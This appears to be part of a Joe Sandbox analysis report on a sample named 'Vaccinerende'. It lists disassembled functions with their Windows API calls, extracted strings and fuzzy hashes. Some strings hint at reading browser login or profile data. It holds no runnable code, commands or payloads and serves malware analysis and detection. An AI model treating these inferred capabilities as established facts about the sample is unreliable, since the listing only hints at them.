                                            Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00411AF6
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                            • wcsrchr.MSVCRT ref: 00411B14
                                            • wcscat.MSVCRT ref: 00411B2E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                            • String ID: AE$.cfg$General$EA
                                            • API String ID: 776488737-1622828088
                                            • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                            • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                            Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040D8BD
                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                            • memset.MSVCRT ref: 0040D906
                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                            • String ID: sysdatetimepick32
                                            • API String ID: 1028950076-4169760276
                                            • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                            • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                            Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                            • memset.MSVCRT ref: 0041BA3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: -journal$-wal
                                            • API String ID: 438689982-2894717839
                                            • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                            • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                            Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Item$Dialog$MessageSend
                                            • String ID:
                                            • API String ID: 3975816621-0
                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                            Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            • _wcsicmp.MSVCRT ref: 00444D09
                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                            • _wcsicmp.MSVCRT ref: 00444D33
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$wcslen$_memicmp
                                            • String ID: .save$http://$https://$log profile$signIn
                                            • API String ID: 1214746602-2708368587
                                            • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                            • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                            Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                            • memset.MSVCRT ref: 00405E33
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                            • String ID:
                                            • API String ID: 2313361498-0
                                            • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                            • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                            Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                            • GetWindow.USER32(00000000), ref: 00405F80
                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageRectSend$Client
                                            • String ID:
                                            • API String ID: 2047574939-0
                                            • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                            • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                            Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: gj
                                            • API String ID: 438689982-4203073231
                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                            Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                            • API String ID: 3510742995-2446657581
                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                            Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                            • memset.MSVCRT ref: 00405ABB
                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                            • SetFocus.USER32(?), ref: 00405B76
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSend$FocusItemmemset
                                            • String ID:
                                            • API String ID: 4281309102-0
                                            • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                            • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                            Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintfwcscat
                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                            • API String ID: 384018552-4153097237
                                            • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                            • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                            Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                            • String ID: 0$6
                                            • API String ID: 2029023288-3849865405
                                            • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                            • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                            Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                            • memset.MSVCRT ref: 00405455
                                            • memset.MSVCRT ref: 0040546C
                                            • memset.MSVCRT ref: 00405483
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$memcpy$ErrorLast
                                            • String ID: 6$\
                                            • API String ID: 404372293-1284684873
                                            • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                            • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                            Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                            • wcscpy.MSVCRT ref: 0040A0D9
                                            • wcscat.MSVCRT ref: 0040A0E6
                                            • wcscat.MSVCRT ref: 0040A0F5
                                            • wcscpy.MSVCRT ref: 0040A107
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                            • String ID:
                                            • API String ID: 1331804452-0
                                            • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                            • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                            Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                            • String ID: advapi32.dll
                                            • API String ID: 2012295524-4050573280
                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                            Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                            • <%s>, xrefs: 004100A6
                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf
                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                            • API String ID: 3473751417-2880344631
                                            • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                            • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                            Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
